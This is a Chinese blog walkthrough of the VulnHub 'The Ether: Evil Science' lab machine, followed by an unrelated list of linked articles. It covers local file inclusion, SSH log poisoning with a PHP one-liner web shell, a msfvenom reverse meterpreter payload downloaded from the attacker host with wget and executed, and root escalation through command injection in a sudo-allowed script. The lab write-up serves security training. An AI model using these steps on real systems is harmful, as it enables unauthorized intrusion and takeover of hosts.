当前位置: 首页 > news >正文

【vulnhub】The Ether: Evil Science靶机

靶机安装

下载地址:https://www.vulnhub.com/entry/the-ether-evilscience-v101,212/

运行环境:Vmware

信息收集

进行IP发现

nmap 192.168.93.0/24

进行端口扫描,开放了80和22端口

nmap -A 192.168.93.155 -p-

进行目录扫描

dirsearch -u http://192.168.93.155 -e *.php

网页访问IP网址

点击各处之后,发下在点击上面的ABOUT US之后,url里有着请求参数:/index.php?file=about.php

可能存在文件包含漏洞

拼接目录扫描出的目录,没有什么有用的信息,

对可能存在文件包含漏洞的页面进行burp抓包,对file参数后面进行文件爆破

标记之后,加入文件包含可能存在的文件的字典

/usr/local/apache2/logs/access_log 
/logs/access_log 
/etc/httpd/logs/access_log 
/var/log/httpd/access_log
/var/log/auth.log

发现有一个/var/log/auth.log目录存在重定向,打开响应包,里面是日志记录,并且是ssh的记录,应该是会把ssh操作记录到这里面,我们尝试利用ssh写入一句话木马,

利用ssh登录产生错误日志写入一句话木马

ssh '<?php @system($_GET[cmd]);?>'@192.168.93.155

访问执行命令

获取shell

用msfvenom生成 shell

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.93.130 LPORT=1234 -f elf > shell.elf

开启监听

#开启环境
msfconsoleuse exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
set lhost 192.168.93.130
set lport 1234
run

在下载的shell.elf文件下面开启web服务,进行远程下载

python3 -m http.server

利用前面的漏洞执行远程下载和运行,将下面的每条命令在网页里拼接在URL参数后面,回车执行就可以,继续下一条命令

/?file=/var/log/auth.log&d1no=system('wget+192.168.93.130:8000/shell.elf')%3b
/?file=/var/log/auth.log&d1no=system('chmod+%2bx+shell.elf')%3b
/?file=/var/log/auth.log&d1no=system('./shell.elf')%3b

三条命令执行完之后,发现监听成功

提权

先将获取到的shell转变为交互式的shell

#进入shell环境
shellpython -c 'import pty;pty.spawn("/bin/bash")'

查询一下sudo提权

sudo -l

发现xxxlogauditorxxx.py 可以以 root 运行。

执行命令

sudo ./xxxlogauditorxxx.py
/var/log/auth.log | whoami

相关文章:

  • 北京网站建设多少钱?
  • 辽宁网页制作哪家好_网站建设
  • 高端品牌网站建设_汉中网站制作
  • 浦语提示词工程实践
  • 从文本到图像:深度解析向量嵌入在机器学习中的应用
  • 面试经验|问题
  • Linux配置go程序为service后台开机自启动
  • Spring统一返回类型中关于String的问题
  • linux源码编译qt6.5问题解决
  • 基于Spring boot + Vue的灾难救援系统
  • Mojo值的生命周期(Life of a value)详解
  • Python酷库之旅-第三方库Pandas(062)
  • 【WPF开发】安装环境、新建工程
  • 一文读懂SEnet:如何让机器学习模型学会“重点观察”
  • 【Hadoop-驯化】一文教你轻松搞懂hadoop的基本原理
  • 单个或两个及以上java安装与环境变量配置
  • Java码农人生使用手册——类和对象
  • Python教程(十一):单元测试与异常捕获
  • .pyc 想到的一些问题
  • bearychat的java client
  • CSS 三角实现
  • css选择器
  • docker-consul
  • JavaScript 是如何工作的:WebRTC 和对等网络的机制!
  • JavaScript创建对象的四种方式
  • MySQL常见的两种存储引擎:MyISAM与InnoDB的爱恨情仇
  • Node 版本管理
  • Quartz初级教程
  • 从零开始在ubuntu上搭建node开发环境
  • 树莓派 - 使用须知
  • 用quicker-worker.js轻松跑一个大数据遍历
  • 中文输入法与React文本输入框的问题与解决方案
  • 最简单的无缝轮播
  • ​香农与信息论三大定律
  • # windows 运行框输入mrt提示错误:Windows 找不到文件‘mrt‘。请确定文件名是否正确后,再试一次
  • # 再次尝试 连接失败_无线WiFi无法连接到网络怎么办【解决方法】
  • $(selector).each()和$.each()的区别
  • $con= MySQL有关填空题_2015年计算机二级考试《MySQL》提高练习题(10)
  • (007)XHTML文档之标题——h1~h6
  • (1)安装hadoop之虚拟机准备(配置IP与主机名)
  • (二)【Jmeter】专栏实战项目靶场drupal部署
  • (二)学习JVM —— 垃圾回收机制
  • (附源码)springboot宠物医疗服务网站 毕业设计688413
  • (全注解开发)学习Spring-MVC的第三天
  • (十三)Flink SQL
  • (贪心 + 双指针) LeetCode 455. 分发饼干
  • (原創) 如何安裝Linux版本的Quartus II? (SOC) (Quartus II) (Linux) (RedHat) (VirtualBox)
  • (转)Java socket中关闭IO流后,发生什么事?(以关闭输出流为例) .
  • (转)ObjectiveC 深浅拷贝学习
  • (转载)Linux 多线程条件变量同步
  • .NET Core WebAPI中使用Log4net 日志级别分类并记录到数据库
  • .NET delegate 委托 、 Event 事件,接口回调
  • .NET:自动将请求参数绑定到ASPX、ASHX和MVC(菜鸟必看)
  • .Net程序猿乐Android发展---(10)框架布局FrameLayout
  • .net和jar包windows服务部署
  • .NET教程 - 字符串 编码 正则表达式(String Encoding Regular Express)
  • .NET设计模式(11):组合模式(Composite Pattern)
  • /run/containerd/containerd.sock connect: connection refused